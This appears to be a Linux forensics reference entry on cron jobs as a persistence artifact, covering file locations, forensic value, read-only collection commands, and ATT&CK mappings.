Cron Jobs

LinuxPersistence MechanismsDisk Image

Location

/etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/<user>

Description

Scheduled task definitions across system-wide crontab, the cron.d drop-in directory, and per-user crontabs. Each entry specifies a schedule, user context, and command to execute.

Forensic Value

Cron is the most common Linux persistence mechanism. Attacker cron entries typically download and execute payloads from external URLs, restart reverse shells at intervals, or run cryptominers. Checking /var/spool/cron/crontabs/ for all users reveals per-user entries that do not appear in the system-wide crontab. File modification timestamps on cron files help establish when persistence was installed.

Tools Required

catfindls -lacrontab -laureport

Collection Commands

tar

tar czf /forensics/output/cron_all.tar.gz /etc/crontab /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ /var/spool/cron/

find

find /var/spool/cron/crontabs/ -type f -exec cat {} \; > /forensics/output/user_crontabs.txt

cat

cat /etc/crontab /etc/cron.d/* > /forensics/output/system_crontabs.txt

find

find /etc/cron.d /var/spool/cron -type f -newer /etc/os-release -ls > /forensics/output/recently_modified_cron.txt

Collection Constraints

•Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.

MITRE ATT&CK Techniques

T1053.003T1053T1059.004

References

systemd.timer Manual NetworkManager Keyfile Format sshd_config Manual systemd-resolved Service

Used in Procedures

Comprehensive Persistence Mechanism Sweep

eradicate

Acquisition Methods

UAC (Unix-like Artifacts Collector)

linux — triage

tar Logical Collection

linux — logical

Velociraptor Offline Collector (Linux)

linux — triage